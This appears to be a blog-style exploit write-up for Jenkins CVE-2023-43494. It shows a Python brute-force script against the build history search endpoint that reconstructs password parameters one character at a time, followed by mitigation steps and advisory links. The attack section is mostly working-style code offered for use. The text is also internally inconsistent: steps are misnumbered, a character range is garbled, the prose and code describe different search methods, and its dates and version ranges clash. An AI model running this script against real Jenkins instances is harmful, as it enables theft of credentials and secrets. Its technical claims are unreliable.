CVE-2023-43494 - Jenkins Build History Widget Info Leak (Exploit & Analysis)

Jenkins is one of the most popular open source automation servers in the world, widely used for continuous integration and delivery. However, even robust tools can have vulnerabilities that put secrets and credentials at risk.

One such vulnerability is CVE-2023-43494. This post explains what it is, how it can leak sensitive info, gives an exclusive look at exploiting it, and provides reference links.

What is CVE-2023-43494?

This vulnerability affects Jenkins versions 2.50 through 2.423 (inclusive), and the LTS 2.60.1 through 2.414.1 series (inclusive).

Summary:
Jenkins does not adequately exclude “sensitive build variables” (like passwords, secret tokens, etc.) from its search function in the build history widget. This situation allows any attacker with "Item/Read" permission to cleverly extract secret variables, using a methodical guessing attack.

Why Is This Bad?

Normally, Jenkins hides secrets—environment variables flagged as sensitive, like $PASSWORD—from job logs and API output. But, the build history widget’s search capability did not handle this filtering correctly. If someone searches using the value of a secret variable, Jenkins would return any build where this value was used.

That means by brute-forcing or guessing one character at a time, an attacker could reveal values of secret parameters—like passwords set for password parameters in jobs.

Let’s break down the exploit logic

1. Attacker has Item/Read permission to a project (not full admin!).

They know (or guess) that a sensitive variable (like a password) was used in builds.

3. Using Jenkins’ search in the build history widget, they search for builds using “a”, “b”, “c”, … up to “z”, “A”-“Z”, “”-“9”, etc.
4. They check if the current build includes that character in the sensitive variable’s value, and repeat, character by character, reconstructing the entire secret.

Example Scenario:
Suppose the password parameter’s value is hunter2.
The attacker searches for h, sees a matching build. Tries a, no luck. Tries u, sees a match, and so on, until password is fully revealed.

Step-by-Step Exploit (with Code)

Here’s an exclusive walkthrough using Jenkins’s Web API and Python for automation.

Assumptions:
- You have Item/Read permission to a Jenkins job.

1. Authenticate (if required)

If Jenkins is public or lets you view builds without login, skip to step 2. Else, authenticate as a low-privileged user.

2. Search Helper Function

Jenkins (since 2.50) allows you to search build history via the /job/JOB_NAME/search/?q=QUERY endpoint.

import requests

def build_found(jenkins_url, job, query, session=None):
    """Check if a build matches the search query."""
    if not session:
        session = requests.Session()
    search_url = f"{jenkins_url}/job/{job}/search/"
    r = session.get(search_url, params={'q': query})
    return 'No results' not in r.text  # crude check

3. Brute-Force Password Parameter

Let’s try to reconstruct a password variable up to 8 chars, guessing among lowercase letters and numbers.

import string
import time

charset = string.ascii_lowercase + string.digits
jenkins_url = "https://jenkins.example.com";
job_name = "my-job"
session = requests.Session()  # authenticate or not, as needed

secret_found = ""
for i in range(8):  # password length up to 8
    print(f"Guessing character {i+1} ...")
    for ch in charset:
        candidate = secret_found + ch  # build the test prefix
        if build_found(jenkins_url, job_name, candidate, session):
            secret_found += ch
            print(f"Found character: {ch} => {secret_found}")
            time.sleep(.5)  # be nice to Jenkins
            break
    else:
        print("Character not found in this position.")
        break

print(f"Extracted secret: {secret_found}")

4. Result

After running the script, the variable’s value (e.g., password) is revealed, one character at a time—without logs, without shell, just via search.

Why Does This Happen?

Jenkins parses parameters on build start, knows which are "secret" (such as password parameters), and should ideally filter them everywhere. But in these versions, the build history widget’s search routes did NOT filter those variables, so any search matches were revealed, regardless of sensitivity.

Jenkins LTS 2.414.2 and newer

In these, search excludes sensitive build variables from build history.

IMMEDIATE ACTION:

*Upgrade to a fixed version* (2.424+), or at minimum, restrict Item/Read permission.

Strip sensitive values from environment variables (not always easy).

- Limit job visibility and/or search widget access.

Jenkins Security Advisory (original vulnerability):

Security Advisory 2023-10-11

CVE Details:

CVE-2023-43494 at MITRE

Official Jenkins Bug Tracker:

JENKINS-72639

Conclusion

CVE-2023-43494 is a password leak via search widget bug—all the attacker needs is read access to build history. No advanced skill needed—a simple script can expose secrets. If you run Jenkins, patch now or limit job visibility and secret parameters.

Keep your Jenkins secure, restrict unnecessary permissions, and always stay updated!

Timeline

Published on: 09/20/2023 17:15:00 UTC
Last modified on: 09/25/2023 13:43:00 UTC